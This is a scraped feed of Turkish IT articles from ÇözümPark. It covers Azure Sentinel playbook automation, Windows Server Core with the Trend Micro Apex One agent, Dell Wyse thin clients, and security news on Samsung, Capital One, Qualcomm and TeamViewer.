The post Azure Sentinel Adım Adım Bulut SIEM Kullanımı – Bölüm8 – Incidents appeared first on ÇözümPark.

Samsung, Güvenlik Açıklarını Gideren Android Güncellemelerini Yayınladı

$
0
0

Samsung, işletim sistemindeki kritik güvenlik açıklarını gidermek için Android’in Ağustos güvenlik güncellemelerini mobil cihazlarda kullanıma sunmaya başladı. Bu hafta Android, cihazları etkileyen kritik güvenlik açıkları için çok sayıda güvenlik yaması içeren Ağustos 2020 güvenlik güncellemelerini yayınladı.

Samsung Galaxy cihazları 8 Ağustos 2020 itibari ile otomatik olarak güncellemeleri alabiliyor. Bu güncellemeler, bazı oldukça önemli güvenlik düzeltmelerinin yanı sıra kamera iyileştirmeleri ve Wi-Fi optimizasyonlarını da kapsıyor.

Bu güncellemedeki tüm güvenlik açıkları ‘Yüksek’ veya ‘Kritik’ önem derecesine sahip olmakla birlikte Android kullanıcıları için cihazlarının korunması için bir gerekliliktir.

Düzeltilen diğer önemli güvenlik açıkları;

Güncellemelere buradan ulaşabilirsiniz.

Kaynak

The post Samsung, Güvenlik Açıklarını Gideren Android Güncellemelerini Yayınladı appeared first on ÇözümPark.

Azure Sentinel Adım Adım Bulut SIEM Kullanımı – Bölüm9 – Playbooks

$
0
0

Azure Sentinel, Microsoft’un bulut temelli SIEM/SOAR ürünüdür. Malum bende son 8 bölümdür bu ürünü sizlere detaylandırmaya çalışıyorum. SIEM/SOAR ürünlerini yakından inceleyenler, kullananlar veya bu konuda danışmanlık yapanların çok iyi bildiği gibi bu tür ürünlerde “respond to threats” yani olası bir tehdide karşı cevap, aksiyon çok önemlidir. Pek çok güvenlik ürünü artık yapay zekayı bünyesine entegre ederek daha otomatize olmaya çalışıyor, çünkü günümüzde ataklar çok daha sofistike ve bu nedenle insan eli ile ayıklama, kontrol etmek her geçen gün daha da zorlaşıyor.

Playbooks tam bu noktada Sentinel ürününe tehditlere karşı otomasyon yeteneği kazandırmaktadır. Temel görevleri ve iş akışlarını zamanlamak, otomatikleştirmek ve düzenlemek için otomasyon adımlarını çalıştırmanıza olanak tanır. Tabi ki bu yeni bir şey değil ancak gerek yerleşik gerekse geleneksel sistemlerde bu tür otomasyonlar için ciddi manada Python, C# ve PowerShell gibi belirli programlama dillerine hâkim olmanız gerekiyordu, Playbooks ise sadece sürükle bırak yöntemi ile son derece kolay bir şekilde otomasyon desteği sunmaktadır.

Temel olarak bir alert oluştuğunda buna karşılık çalıştırılabilen bir prosedürler koleksiyonudur. Oluşturduğunuz bu güvenlik çalışma kitapları (Türkçesi de çok anlamlı olmuyor ama) isterseniz elle isterseniz otomatik çalışmaktadır. Yani genelde bu kısmı atlayabiliyor insanlar, sürekli bir tetiklemenin otomatik olması gerekmiyor, sizin için örneğin bir süreç vardır ve bunu elle istediğiniz zaman tetiklemek istiyor olabilirsiniz.

Azure Sentinel Playbooks temelde Azure Logic Apps kullanır. Yani bu Logic Apps ‘in tüm gücünü, özelleştirilebilirliğini ve yerleşik şablonlarını kullanabileceğiniz anlamına geliyor. Burada yine önemli bir konu her bir Playbooks aslında belirli azure üyeliği için oluşturulmasına rağmen siz bu sayede tüm playbook’ ları görebilirsiniz.

Peki bu kadar giriş bölümünden sonra isterseniz yavaş yavaş uygulama bölümüne geçelim. Bunun için hızlı bir şekilde azure Sentinel panelini açıyoruz ve sol bölümden “Playbooks” linkine tıklıyoruz.

Gördüğünüz gibi hiçbir playbook tanımlı değil, hızlıca bir tane tanımlamak için Add Playbook linkine tıklayalım.

Not: Eğer bu işlemleri global admin ile yapmak istemiyor veya tanımlı playbook’ lar için erişim yetkileri vermek istiyorsanız aşağıdaki tabloyu incelemenizi öneririm;

Daha fazla bilgi için, https://docs.microsoft.com/en-us/azure/sentinel/roles#roles-and-allowed-actions

Sizi yukarıdaki gibi bir ekran karşılayacaktır. Öncelikle bir Logic App oluşturmanız gerekli. Makalemin başında Azure Sentinel Playbooks’ un aslında alt yapıda Logic App kullandığını söylemiştim.

Bu ekranda pek çok şablon olduğunu görebilirsiniz. İsterseniz mevcut bir şablon üzerinden isterseniz Blank Logic App diyerek sıfırdan bir şablon kullanabilirsiniz. Biz sıfırdan bir şablon oluşturalım.

Örnek benim internete açık ve tuzak için kurduğum bir RDP makinesi var, yani sürekli olarak atak alıyor ve bende bu ip adreslerini sentinel üzerinde topluyorum. Bunun zaten makale serimi eğer başından sonuna okuduysanız biliyorsunuzdur. Şimdi ben basit bir örnek ile eğer böyle bir atak gelir ise sistemin beni mail ile uyarmasını istiyorum.

Bunun için yukarıdaki ekranda “sentinel” yazdıktan sonra aşağıdaki bölümde Triggers yani tetikleyiciyi seçiyorum. Burada tetiklemeden anlamamız gereken ne olur ise bu playbook çalışacak, eyleme geçecek gibi düşünebilirsiniz. Yani sentinel üzerinde bir alert veya incident olurşur ise, ben Alert’ i seçiyorum.

Bu bölümde yine söylediğim gibi tenant bazlı olduğu için hangi tenant için bu playbook oluşturulacak ise onu seçiyorum. Login olduktan sonra New step linkine tıklıyoruz.

Açılan menüde arama bölümüne “send email” yazınca Office 365 veya isterseniz gmail dahil pek çok alternatif bulabilirsiniz. Yani mail göndermek için illa office 365 hesabınızın olmasına gerek yok. Herhangi bir SMTP sunucu bilgisi ile de mail gönderebilirsiniz.

Office 365 üzerine tıkladığınız zaman bu sefer ne yapmak istediğinizi seçeceğiniz birçok seçenek çıkacaktır, burada ben yine arama bölümüne send diyerek mail göndermek istediğimi belirtiyor ve çıkan seçeneklerden “Send an email” bölümünü seçiyorum.

İsterseniz bu bölümde sonlandırabilirsiniz. Yani bir alert oluştuğu zaman mail atma işlemi için bu adımlar yeterlidir. Ya da new step diyerek devam edebilirsiniz.

Not: Analytics bölümünde tanımladığınız rule içerisinde aşağıdaki gibi mutlaka playbook seçili olmalıdır.

Elle çalıştırdığım zaman sonuç aşağıdaki gibidir;

Bunun nedeni herhangi bir sorun var mı anlamak. Sonrasında ise sadece bekliyorum ve atak devam ettiği için bu sefer sistem otomatik mail gönderiyor

Evet gördüğünüz gibi sorunsuz bir şekilde mail gönderimini sağladık. Peki başka neler yapabiliriz? Mevcut playbook için edit demeniz halinde aşağıdaki gibi bir ekran karşınıza gelecektir.

Burada New step diyerek yapmak istediğiniz diğer aksiyonları da ekleyebilirsiniz. Burada size fikir vermesi için aşağıdaki linki paylaşmak istiyorum.

https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks

Yani aslında bu bölümde çok ciddi kurallar yazarak olası tehditlere karşı ciddi bir defans yapma şansınız var. Ya da aşağıdaki gibi ara yüz üzerinden devam edebilirsiniz.

Örneğin atak alan sanal makineyi kapatabilirsiniz. Ya da ip adresini alalım ve sonrasında bu ip adresi için NSG üzerinde bir 3389 blok yazdırabiliriz.

Özetle aslında burada yapabilecekleriniz aynı on-prem siem ürünlerinde olduğu gibi biraz çevresel birimler ile ilgili. Yani SQL, SAP, Oracle, network konuları, kimlik doğrulama alt yapıları gibi genel saldırı yüzeyleri için otomatik cevaplar ve aksiyonlar tasarlamak bir noktada güvenlik uzmanlarının görevi.

Bu yazımında sonuna geldim, umarım faydalı olmuştur, bir sonraki paylaşımımda görüşmek üzere.

The post Azure Sentinel Adım Adım Bulut SIEM Kullanımı – Bölüm9 – Playbooks appeared first on ÇözümPark.

Capital One 80 Milyon Dolar Ceza Ödeyecek

$
0
0

Dünyanın önde gelen kredi kartı sağlayıcılarından birisi olan Capital One, 2019 yılında yaklaşık 106 milyon kullanıcıyı etkileyen bir veri ihlali yaşamıştı.

Yaşanan bu siber olay Amerikan şirketine 80 milyon dolara mal oldu. Ceza, ABD hazine bakanlığına bağlı olan Office of the Comptroller of the Currency (OCC)” para denetleme bürosu tarafından verildi.

OCC yaptığı açıklamada Capital One’ın BT alt yapısını bulut ortamına taşıma operasyonunun başarısız olduğunu, ayrıca 2015 yılında yapılan bir iç denetimde bulut tabanlı depolama ortamında çok fazla güvenlik açığı tespit edildiğini ve bunları kapatmakta başarısız olduğunu açıkladı.

OCC, yapılan hatalar ve gerekli tedbirlerin alınmaması sonucu siber saldırganların kredi kartı bilgilerinin yanı sıra, yaklaşık 140.000 sosyal güvenlik numarasını ve ABD müşterileriyle bağlantılı 80.000 banka hesap numarasını, ayrıca 1 milyon Kanada sosyal sigorta numarasını da çalmayı başardı.

Eski Amazon web hizmetleri çalışanı 33 yaşındaki Paige Thompson olarak bilinen bilgisayar korsanı, ihlalin ardından tutuklandı ve beş yıl hapis ve 250.000 dolar para cezasına çarptırıldı.

İhlal, Thompson’ın Mart ayında Capital One’ın Amazon Web Services bulut sunucusundaki yanlış yapılandırılmış bir güvenlik duvarını istismar ettiği ve bu sunucuda depolanan 700’den fazla veri içeren klasörü çalması sonucu meydana geldi.

OCC, 80 milyon dolarlık para cezasına ek olarak Capital One’a siber güvenlik yatırımı yapmasını, ayrıca 90 gün içinde yapılacak çalışmalar ve alınacak tedbirler ile alakalı plan oluşturması konusunda talimat verdi.

Kaynak

The post Capital One 80 Milyon Dolar Ceza Ödeyecek appeared first on ÇözümPark.


Windows Server 2019 Core Edition ve Trendmicro Apexone Security Agent Kullanımı

$
0
0

Bu makalede Windows Server 2019 Core işletim sisteminden, bu işletim sistemi üzerinde Trendmicro Apexone Security Agent kurulumu ve kullanımından bahsedeceğim.
Windows Server 2019 Core Edition işletim sistemi ile başlayalım dilerseniz.

  • Windows Server 2019 kurulumu yapmaya karar verdiğimiz de kurulum işlemini öncelikle grafiksel bir arayüze sahip bir işletim sistemi ile (Desktop Expirence) mi yoksa grafiksel yönetim araçlarına sahip olmayan bir işletim sistemini (Server Core) seçerek mi tamamlamak istediğimize karar vermeliyiz. Bu karardan sonra Standard mı yoksa Datacenter’mı kuracağımız da belirleyerek kurulum işlemini gerçekleştirebiliriz.
  • Windows Server 2019 kurulum işlemi tamamlandıktan sonra Desktop Expirence özelliği eklenemez ve kaldırılamaz.
  • Windows Server Core Windows Server 2019 işletim sisteminin Standart ve Datacenter sürümlerinde yer almaktadır ancak Windows Server 2019 Essentials sürümünde yer almamaktadır.
  • Windows Server Core işletim sistemi notepad,regedit,task manager gibi komut satırından çalıştırılabilen araçlar dışında  grafiksel yönetim araçlarına sahip olmadığı için bu işletim sistemini yönetebilmek ve yapılandırabilmek için Windows Server Core üzerindeki yönetim araçlarıdan ve Remote Server Administration Tool,Windows Admin Center gibi araçlardan faydalanabiliriz.
  • Windows Server Core’un Windows Server with Desktop Experience’a göre bir takım avantajları ve dezavantajları bulunmaktadır.
    Bu avantaj ve dezavantajları gözönünde bulundurarak bulunduğumuz yapıya uygun kurulum seçimini yapabiliriz.
  • Avatajlarına kısaca bakacak olursak,daha az yer ve daha az kaynak kullanımı,daha az bileşen içermesi buna bağlı olarak daha az güncelleme ve restart gereksinimi olması ve daha az atak alma alanını verebiliriz.
  • Dezavantajları ise bazı uygulamaların server core üzerine kurulamamaları,bazı role ve featureların Windows Server Core üzerinde yer almaması verilebilir.

Windows Server Core kurulumu ve kurulum sonrası gerçekleştirilecek işlemler

Windows Server Core kurulumunun Desktop Experience’a sahip işletim sistemi kurulumundan bir farkı bulunmamaktadır.

Dolayısıyla burda kurulum adımlarından bahsetmeyeceğim.
Windows Server Core yönetimini sconfig,powershell gibi araçları kullanarak yönetebileceğimizden bahsetmiştik.

Ben burda Sconfig aracını kullanarak Windows Server’un temel ayarlarını nasıl gerçekleştirebileceğimizden bahsedeceğim.

Sconfig aracını kullanarak Windows Server Core yönetiminin gerçekleştirilmesi

Windows Server Core kurulumundan sonra karşımıza sadece  bir komut satırı ekranı gelir.

Sconfig text tabanlı ve Server Core ile ilgili temel ayarlamaları yapabileceğimiz,Windows Server Core ile çalışmaya başlayabilmemiz için gerekli yapılandırmaları yapmamızı sağlayan bir araçtır.

Sconfig aracı Server core içerisinde yer alan bir araçtır.
Sconfig aracını kullanarak Server Core kurulumu tamamlandıktan sonra veya herhangi bir zaman da temel,ilk yapılandırma işlemlerini gerçekleştirebiliriz.

Şimdi kurulumdan sonra karşımıza gelen komut satırı ekranında sconfig yazarak komutu çalıştıralım.

Görüldüğü gibi sconfig aracı çalıştırabileceğimiz 15 farklı komut  sunmaktadır ve herhangi bir komutu çalıştırmak için ilgili komut numarasını yazarak enter tuşuna basmamız yeterli olacaktır.

Bu komutların neler olduğu aslında komutların adlarından anlaşılabilmektedir.
Örneğin Computer Name yani 2 yazıp enter tuşuna basarak  Server Core işletim sistemimizin hostname’ini değiştiriyoruz yada Network Settings yani 8 yazıp enter tuşuna basarak Server core işletim sistemimize ait ağ ayarlarını değiştirebiliyoruz.
Şimdi Server Core işletim sistemimizi sconfig ile temel olarak yapılandıralım.
Öncelikle tarih saat ve time zone ayarlarını yapılandıralım. Bunun için 9 yazıp enter tuşuna basıyoruz ve aşağıdaki ekranda eğer gerekiyorsa değişiklikleri gerçekleştiriyoruz ve OK tuşuna basarak geri dönüyoruz.

Şimdi de 2 yazıp enter tuşuna basalım ve Server Core işletim sistemimizin hostname değişikliğini gerçekleştirelim.

Bilgisayarı yeniden başlatmamızı istiyor Yes diyerek yeniden başlatma işlemini onaylayalım.

Son olarak 8 yazıp enter tuşuna basalım ve Network Settings’e girelim.

Hangi ağ kartı ile işlem yapacağımızı soruyor zaten bir tane var. 1 yazıp enter tuşuna basalım.

Gelen seçenekleri kullanarak ağ ayarlarımızı yapılandırabiliriz.

Sconfig aracını kullanarak Server Core işletim sistemimizi temel olarak nasıl yapılandırabileceğimizden bahsettik.

Trendmicro Apexone Security Agent kurulumu

Windows Server Core işletim sistemini temel olarak yapılandırdıktan sonra Trendmicro Apexone Security Agent kurulumunu gerçekleştirebiliriz.

Agent kurulumunu farklı şekillerde gerçekleştirebiliriz. Biz aşağıdaki yöntemi tercih ederek kurulum işlemini gerçekleştireceğiz.

Öncelikle kurulum dosyamızı ağ üzerinde bir klasöre kopyalıyoruz ve bu kopyaladığımız klasörü paylaşıma açıyoruz.

Windows Server Core  işletim sistemimizde net use sürücü harfi: \\Agent dosyasının olduğu ağ konumu komutunu veriyoruz.
Örneğin net use M: \\192.168.0.50\msi komutunu veriyoruz.

Aşağıda görüldüğü üzere Trendmicro Apexone agent dosyamızın olduğu klasöre ağ sürücüsü olarak bağlanmış durumdayız.

M sürücüsünün içine giriyoruz ve agent kurulum dosyamızı Windows Server Core sunucumuzun lokal diskinden bir klasöre kopyalıyoruz.

Kopyalamış olduğumuz lokal konumundan Agent kurulum dosyamızın ismini yazarak kurulum işlemini başlatıyoruz. Next ile kurulumu ilerletiyor,Finish ile kurulumu tamamlıyoruz.

Windows Server Core işletim sistemimize ait hostname Apexone Central yönetim konsoluna gelecektir.

Yönetim konsolunda Windows Server Core işletim sistemimizi yönetebilir ve tespit edilen tehditleri görüntüleyebiliriz.

Şimdi de Windows Server Core işletim sistemi komut satırından
Security Agent ile ilgili görevleri gerçekleştirmek için kullanabileceğimiz komutları inceyelim.

Öncelikle Pccntmon.exe uygulamasının olduğu C:\Program Files (x86)\Trend Micro\Security Agent klasörüne gidiyoruz.

Burdaki komutları inceleyecek olursak,

Pccntmon -c komutunu vererek Security Agent ile ilgili detaylı bilgi alabiliriz.

Pccntmon -v komutunu vererek Security Agent bileşenleri ve sürümleri ile ilgili detaylı bilgi alabiliriz.

Pccntmon -u komutunu vererek Security Agent bileşenlerini güncelleyebiliriz.

Pccntmon -n <unload parolası> komutunu vererek Security Agent’ı devre dışı bırakabiliriz.

Security agent’ı tekrar etkinleştirmek için pccntmon komutunu vermemiz yeterli olacaktır.

Pccntmon komutunu verdikten sonra pccntmon -c ile Security agent’ın tekrar etkinleştirilmiş olduğunu görebiliriz.

Pccntmon ile gerçekleştirebileceğimiz tüm işlemlerin listesini görmek için ise pccntmon -h komutunu veriyoruz.

Pccnt komutu sayesinde ise belirlediğimiz bir sürücüyü veya bir klasörü tarayabiliriz. Ancak burda belirli bir dosyanın taranması desteklenmemektedir.

Pccnt C:\ komutunu vererek C sürücüsü için tarama işlemi gerçekleştirebiliriz yada Pccnt C:\nihat diyerek nihat klasörünün taranmasını sağlayabiliriz.

Bu makalede Windows Server 2019 Core işletim sisteminden ve bu işletim sistemi üzerinde Trendmicro Apexone Security Agent kurulumu ve kullanımından bahsettim.

Kolay gelsin

The post Windows Server 2019 Core Edition ve Trendmicro Apexone Security Agent Kullanımı appeared first on ÇözümPark.

Thin Client – Dell Technologies Wyse

$
0
0

Hızla değişen ve gelişen Dünya’da bu sürece ayak uyduran teknoloji ile birlikte değişmeye başlayan IT yapılanma şekli günümüzde thin client (ince istemci) gibi sistemler ile daha da kompakt hale gelmiştir. Güçlü sunucular ile bir araya getirilen basit kutular (thin client) ile daha merkezi, uygun maliyetli ve güvenli çözümler gündem olmaya başladı. Bu makalede sizlere Dell Technologies’in thin client çözümü olan Wyse’dan ve onun model portföyünden bahsedeceğim.

Dell’in çözümü olan Wyse’a geçmeden önce thin client nedir, neden böyle bir cihaza ihtiyaç duyulmuştur, avantajları nedir gibi sorulara değinelim.

Thin client aslında bir bilgisayardır ve uzak sistemleri sunucuya bağlamak için geliştirilmiştir. Normal bir bilgisayardan farklı olarak düşük enerjili işlemcilere, belleğe ve sınırlı hareketli parçalara sahip donanım içerir. Aynı zamanda içerisinde veri kaydı için disk olmadığından üzerine hiçbir şey kaydedilemez sadece sunucu üzerindeki verilere bağlanıp onları işleyebilir. Tabiri caizse sunucu elçisi diyebiliriz. Thin client üzerinden yazdığınız komutlar uygulamaların ve veri tabanlarının depolandığı sunuculara gönderilir, sunucu gerekli hesaplamaları yaparak çıktıyı thin client üzerinden verir. Daha detaylı anlatacak olursak Thin client’lar kendilerine özgü yazılımlar ile çalışır. Dell Wyse için bu yazılımlar Thin OS, Thin Linux ve Windows’tur. Bu yazılımlar aracılığı ile thinclient’ın sağladığı kimlik bilgileri ile oturum açtığınızda size thin client’ın sunucusuna bağlar ve sizin erişebilmenize izin verilen tüm uygulamalara erişebilir, gerekli tüm görevleri yapabilir, çıktı alabilir, web browser’da gezebilirsiniz. Size izin verilen çerçevede kişisel bilgisayarınızda yapabileceğiniz tüm her şeyi yapabilirsiniz. Gereken tek şey ağ bağlantısı ve sunucu sistemine erişimdir.

Thin client’larda yönetim için ayrıca bir yazılım mevcuttur. Dell Wyse yönetim yazılımı “Wyse Management Suite” olarak karşımıza çıkmaktadır. Yönetim yazılımı sunucuya yüklenir ve sunucuya bağlı tüm thin clientlar konsol görevi gören bu yazılım tarafından yönetilir. Thin clientlar’a tüm müdahale bu yazılım sayesinde uzaktan gerçekleştirilebilir.

Thin client nasıl çalışır adım adım detaylandırırsak;

  1. Thin client İşletim Sistemini başlatın. (Wyse için ThinOS, Thinlinux ve Windows)
  2. IP adresini alın ve diğer sistem değişkenlerini ayarlayın.
  3. Thin clientın sunucusuna bağlanın (RDP, ICA, PCoIP veya diğer birçok endüstri standardı protokolünü kullanarak). Kullanılan en yaygın protokol RDP protokolüdür.
  4. Kullanıcı wyse aracılığı ile sunucu tarafı kimlik bilgilerini kullanarak sunucuda oturum açar.

Normal bilgisayarlar varken neden böyle bir cihaza ihtiyaç duyulmuştur avantajları nelerdir diye soracak olursak;

-Maliyet: Thin client’lar uzman gerektirmeyecek kadar basit cihazlar olduğundan teknik destek gerektirmez böylece teknik destek ekibi için kullanılacak maliyeti azaltabilirsiniz. Ayrıca disk, fan, yüksek CPU vs gerektirmediği için ilk alım maliyeti de tipik bilgisayarlara göre daha uygundur ve sınırlı hareketli parçalara, düşük bellek ve mikroişlemci taleplerine sahip olan thin clientlar tarafından kullanılan enerji diğer bilgisayarlara göre daha çok daha azdır bu nedenle elektirik tasarrufu sağlar.

-Zaman tasarrufu: Gerekli güncelleme, yükleme ve yamalar tüm thin client’lara tek sistemden (sunucu üzerinden) yapıldığı için IT ekibi zaman tasarrufu sağlar.

-Kolaylık: Kurulumu, kullanımı, yönetimi vs oldukça kolaydır, herhangi bir uzmanlık gerektirmeden herkes kullanabilir. Ayrıca donanım ve yazılım yükseltmeleri ve uygulama değişiklikleri veri merkezinde kolayca yapılabilir.

-Güvenlik: Thin clinet üzerinde disk bulunmadığından verilerin sızma olasılığı azalır, ayrıca veriler bireysel sistemlerde saklanmadığından silinme olasılığı da daha azdır.

Kullanıcılar diske bilgi kopyalayamaz veya sunucu dışındaki konumlara kaydedemez. Şirketleri kötü amaçlı yazılım saldırılarına ve veri ihlali girişimlerine karşı koruyan thin clientlara yetkisiz yazılım veya uygulamalar yüklenemez. Bütün bunlar fikri mülkiyeti korur ve veri gizliliğini sağlar.

-Kontrol: Thin client tamamıyla sunucu tarafından kontrol edildiğinden systemin kullanımı, çalışanların verimliliği vs kolayca takip edilebilir. Ayrıca çalışanlar gerekli araçların ötesinde bir şeye erişemediklerinden verimlilikleri artar.

Yukarıda bahsettiğimiz daha bir çok avantajından dolayı thin client finansal kurumlarda,eğitim sektöründe, sağlık kuruluşlarında, perakende sektöründe ve özellikle bilgi güvenliğinin çok daha önemli olduğu devlet kurumlarında yaygın olarak kullanılmaktadır.

Thin client’lar ile ilgili genel bilgilendirmeden sonra Dell’in thin client ürünü olan Wyse’ a dönecek olursak;

Wyse yazılımlar ile optimize edilmiş performansı, üst düzey güvenlik ve akıllı yönetim sistemi ile sanal çalışma alanlarınızı geliştirmek ve daha verimli bir çalışma ortamı sunmak için tasarlanmıştır.

Güvenlik, yönetim ve verimlilik olmak üzere 3 ana temel üzerinde yapılandırılmış olan Wyse, sanal masaüstü çözümlerini daha güvenli, kolay yönetilebilir ve uçtan uca güvenli bir şekilde sunmaktadır.

-Güvenlik: Wyse ince istemcileriyle, veriler ve uygulamalar güvenlik ve gizliliği sağlamak için güvenli bir veri merkezinde depolanır. Wyse virüs ve kötü amaçlı yazılımlara karşı dayanıklıdır ve role dayalı bilgi dağıtımını destekler. Tüm Wyse kullanıcıları her bilgiye erişemez sadece kendisine izin verilen bilgiye erişim sağlayabilir bu da çalışanların her zaman her yerde güvenle çalışmasına yardımcı olur.

-Yönetim: İster güncellemeler, yamalar ya da herhangi bir günlük operasyonel görev olsun, Wyse Management Suite, Wyse uç noktalarını buluttan ve / veya veri merkezinden yönetmeyi ve iş gereksinimlerine daha duyarlı olmayı kolaylaştırır.

-Verimlilik: Az enerji çok verim ilkesi ile var olan Wyse herhangi bir VDI ortamında çalışmaya hazırdır, birden fazla 4K monitör desteği, birleşik iletişim için yerel olanak ve zengin bağlantı sayesinde insanların üretken kalmalarını kolaylaştırmak için tasarlanmıştır.

Temel ilkelerden sonra thin clientların bir diğer bileşeni olan işletim sistemi tarafında Wyse’ın ThinOS, ThinLinux ve Windows 10 IOT Enterprise olmak üzere 3 farklı işletim sistemi desteği mevcuttur.

İş ortamınız için hangi yazılım uygunsa gönül rahatlığı ile tercih edebilirsiniz çünkü tüm işletim sistemleri son kullanıcı deneyimleri üzerinde çalışılarak her durumda daha akıllı, daha hızlı çalışanlar, güvenli ve kolay yönetim ilkeleri baz alınarak tasarlanmıştır.

-Wyse ThinOS: ThinOS, virüs önleme ve kötü amaçlı yazılımlara karşı dayanıklı en ince / sıfır istemci ürün yazılımıdır. Özellikle size huzur vermek için yapılmıştır.

-Wyse Thinlinux: ThinLinux yerel Linux uygulamalarını destekler, yenilikçi çevresel destek sağlar ve açık kaynak tabanlıdır

-Windows 10 IOT Enterprise: Dell’in güvenlik, yönetim ve kullanıcı deneyimindeki optimizasyonlarını zengin bir Windows ekosistemiyle birleştirir.

Tüm IT yöneticileri için cihazların özellikleri, performansı, verimliliği olduğu kadar yönetimi de önem taşımaktadır. Dell’de tüm cihazlarında olduğu gibi Wyse özelinde de bu durumdan yola çıkarak oldukça basit bir yönetim paneli sunmuştur. Wyse Management Suite ile tek dokunuşla yönetmek ve yapılandırmak mümkündür. Yönetim yazılımı ile yerinde ve bulutta thin client yapılandırması, dağıtımı ve yönetimi için IT çabalarını basitleştirir.

Ayrıca Dell’in destek paketi olan “ProSupport for Software” ile 7 gün 24 saat destek, yardım ve kapsamlı sorun giderme hizmeti mevcuttur.

Yine Dell’e özel “Accidental Damage” paketi ile bir nevi donanımınızı sigortalamak mümkündür. Özellikle yüksek riskli kullanım ortamları için biçilmiş kaftan olan bu paket sayesinde iş yerinde veya evde önleyemediğiniz elektrik dalgalanmaları,düşme veya sıvı dökülmesi gibi durumlara maruz kalan donanım Sistemleri servis kapsamında onarılmakta veya değiştirilmektedir.

Wyse her zaman iyi bağlantılı, yüksek güvenlikli ve sanal ortamları dağıtmak için uygun bir seçenek sunan az bakım gerektiren bir cihazdır.

The post Thin Client – Dell Technologies Wyse appeared first on ÇözümPark.

ÇözümPark Haftalık Bülten – 10 Ağustos 2020

$
0
0

ÇözümPark Webcast

Webcast – Unutulmaz Video ile İş birliği Deneyimi Yaratan Premium Ses – 18 Ağustos Salı Saat 10:00

Güncel Teknoloji Haberleri

Capital One 80 Milyon Dolar Ceza Ödeyecek

Samsung, Güvenlik Açıklarını Gideren Android Güncellemelerini Yayınladı

Intel Veri Sızıntısı: 20 GB Kaynak Kodu Ve İddia Edilen İhlallere İlişkin Dahili Belgeler

Microsoft, En Son Yayınlanan Windows 10 Sürümündeki İnternet Yok Hatasını Düzeltti

Iphone 12 ‘de Yeni Neler Var? Satış Tarihi Ertelenecek Mi

ASELSAN Siber Güvenlik Birimi göreve başladı

Kamuoyu Duyurusu (Veri İhlali Bildirimi) – Penti Giyim Sanayi ve Ticaret Anonim Şirketi ve İştirakleri

BM, Pandemi Sırasında Siber Saldırılarda Keskin Bir Artış Yaşandığını Bildirdi

5G’den En Fazla Kim Faydalanacak?

Canon, Fidye Saldırısını Doğruladı

Makaleler

Windows Server 2019 Core Edition ve Trendmicro Apexone Security Agent Kullanımı

Azure Sentinel Adım Adım Bulut SIEM Kullanımı – Bölüm9 – Playbooks

Azure Sentinel Adım Adım Bulut SIEM Kullanımı – Bölüm8 – Incidents

Centos 7 / Rhel 7 Sunucularını Active Directory Etki Alanına Katma

File Server Yönetiminde Farklı Perspektiflerden Görünürlük Nasıl sağlanır?

Yeni Azure Stack HCI nedir? Preview kurulumu ve konfigürasyonu nasıl yapılır? – Bölüm 2

Yeni Azure Stack HCI nedir? Preview kurulumu ve konfigürasyonu nasıl yapılır? – Bölüm 1

Solarwinds Network Monitoring 2020.2 Kurulumu

Raspberry Pi 4 Üzerine Ubuntu 20.04 LTS Kurulumu

Amazon EC2 -Elastic Compute Cloud Servisi Bölüm 4

Bloglar

Erp Geçiş Süreçleri ve Yaşam Döngüsü

Dijital Ekonomide Hız Önemlidir

Bilişim Sektöründe Sertifikaların Önemi

Microsoft Endpoint Veri Kaybı Önleme DLP Genel Ön izlemesi Duyuruldu!

Oracle Data Redaction Nedir? Bölüm -1

Cisco Yamaları ve Çoklu Güvenlik Açıkları

VMware Araçlar ile Güvenlik – Security with VMware Tools

Oracle Clusterware Node Eviction Nedir ?

Telefon Ömrünüzü Uzatma Rehberi

Windows Server Ping ve ICMP İsteklerine Cevap Verme

The post ÇözümPark Haftalık Bülten – 10 Ağustos 2020 appeared first on ÇözümPark.

Qualcomm Yonga Setlerindeki Açıktan Dolayı Milyonlarca Android Telefon Risk Altında

$
0
0

Check Point araştırmacıları, Qualcomm’un Android cihazlarda kullanılan Snapdragon yonga setinde 400’den fazla güvenlik açığı buldu.

Qualcomm firmasının Android akıllı telefonlarında kullanılan Snapdragon yonga seti, dünya çapında 3 milyar civarı kullanıcıyı riske atma durumu söz konusu.

Qualcomm yonga setleri, akıllı telefon pazarının ortalama % 40’ından fazlasında aktif olarak kullanılmakta ve farklı fiyatlarda birçok telefonu bulunmaktadır. Örnek olarak; Google, Samsung, LG, Xiaomi ve daha fazlası gibi. CheckPoint firması, bu yonga setini test etti ve 400’den fazla savunmasız kod bölümü keşfetti. Eğer istismar olursa, korsanlar herhangi bir akıllı telefonu, kullananın izni olmadan bir casusluk aracına dönüştürebilirler. Bilgisayar korsanları, fotoğraflar, videolar, arama kayıtları, gerçek zamanlı mikrofon verileri, GPS ve konum verileri dâhil olmak üzere birçok önemli veriye erişebilirler.

Bir diğer tehlikeli potansiyel şey ise, bilgisayar korsanlarının bu telefonlara yalnızca yaptıklarını gizlemekle kalmayacak, onları kaldırılamaz hale getirecek kötü amaçlı yazılımlar ve kötü amaçlı kodlar yerleştirebilmeleridir.

Check Point, “Ayrıca, telefonlarını güvenli hale getirmelerine yardımcı olmak için ilgili devlet görevlilerini ve araştırmada birlikte çalıştığımız ilgili mobil satıcıları güncelledik” dedi.

Check Point, Qualcomm firmasını bilgilendirdi ve keşfedilen altı güvenlik açığını yamaladı. Ancak, Android kullanıcıları tamamen güvende olması için, telefon satıcılarının güvenlik düzeltmelerini telefonlarına sunması gerekecek.

Qualcomm yonga seti güvenlik açıkları yalnızca Android akıllı telefonları etkilemektedir. Apple şirket içi yonga seti kullandığı için iPhone telefonlar daha güvenli gözüküyor.

Kaynak

The post Qualcomm Yonga Setlerindeki Açıktan Dolayı Milyonlarca Android Telefon Risk Altında appeared first on ÇözümPark.

Teamviewer Kritik Güvenlik Açığını Kapattı

$
0
0

Popüler uzaktan erişim ve destek uygulaması Teamviewer, saldırganların arka planda sistemlere erişim sağlayıp uzaktan kod çalıştırmasına imkan veren güvenlik açığını kapattı.

İlgili zafiyet, CVE-2020-13699 takip numarası ile numaralandırılmış durumda ve “Unquoted Search Path or Element (CWE-428)” ismiyle özel kategoride bir zafiyet olarak tanımlanıyor. İlgili güvenlik açığı temelde bilinen bir uygulama tarafından gönderilen parametrelerin herhangi bir kontrol veya kısıtlama ile karşılaşmaması sonucu oluşan açıktan faydalanılarak istismar ediliyor. Uygulamalarda bu şekilde bir açık varsa programlara gönderilen çalıştırma veya fonksiyon parametreleri yerine doğrudan işletim sistemi komutları gönderilerek açıktan faydalanılmaya çalışılıyor.

